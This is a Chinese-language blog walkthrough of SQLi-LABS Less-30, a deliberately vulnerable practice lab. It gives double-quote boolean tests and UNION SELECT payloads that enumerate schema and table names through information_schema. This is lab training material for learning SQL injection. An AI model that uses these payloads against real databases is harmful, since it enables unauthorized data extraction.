开发者社区数据库文章正文

SQLi LABS Less-30

2021-12-31 147

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 第30关使用GET请求传递参数,在url中构造payload即可后端源码中并没有做什么过滤,只是在参数两边添加了双引号

第30关使用GET请求传递参数,在url中构造payload即可

后端源码中并没有做什么过滤,只是在参数两边添加了双引号

输入 1" and true-- a,页面正常显示

输入 1" and false-- a,页面空显示

由此可证明存在SQL注入,注入点为双引号字符型注入

页面中有显示位,可以使用联合注入进行脱库

1. -1" union select 1,2,
2. (select group_concat(schema_name) from information_schema.schemata)
3. -- a

脱表

1. -1" union select 1,2,
2. (select group_concat(table_name) from information_schema.tables
3. where table_schema='security')
4. -- a

文章标签：

SQL

士别三日wyx

不拿flag不改名

7月前

安全数据库数据安全/隐私保护

sqli-labs第一关

不拿flag不改名

42 0 0

士别三日wyx

SQL 数据库

SQLi LABS Less-26a

第26a关使用GET请求传递参数,在url地址栏中构造payload即可源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可

士别三日wyx

328 0 1

士别三日wyx

SQL

SQLi LABS Less-29

第29关使用GET请求提交参数,在url中构造payload即可源码中并没有做什么过滤,直接测试注入点即可

士别三日wyx

219 0 0

士别三日wyx

SQL

SQLi LABS Less-31

第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号

士别三日wyx

156 0 0

士别三日wyx

SQL

SQLi LABS Less-27

第27关使用GET请求传递参数,在url中构造payload即可源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则

士别三日wyx

349 0 0

士别三日wyx

数据库数据安全/隐私保护

SQLi LABS Less-19

第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下

士别三日wyx

186 0 0

士别三日wyx

SQL 数据库数据安全/隐私保护

SQLi LABS Less-16

第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下

士别三日wyx

155 0 0

士别三日wyx

SQL 数据库数据安全/隐私保护

SQLi LABS Less-21

21关使用POST请求提交参数,对用户名和密码中的特殊字符进行了转译,难度较大

士别三日wyx

170 0 0

士别三日wyx

SQL

SQLi LABS Less-25a

第25a关使用GET请求传递参数,在url地址栏中构造payload即可后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过

士别三日wyx

232 0 0

士别三日wyx

SQL

SQLi LABS Less-23

第23关使用GET请求传递参数,在url地址栏构造payload即可此关卡对注释符号进行了过滤,因此不能使用注释符,可以使用单引号闭合,使SQL的语法结构成立

士别三日wyx

156 0 0

SQLi LABS Less-30

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

SQLi LABS Less-30

热门文章

最新文章

相关电子书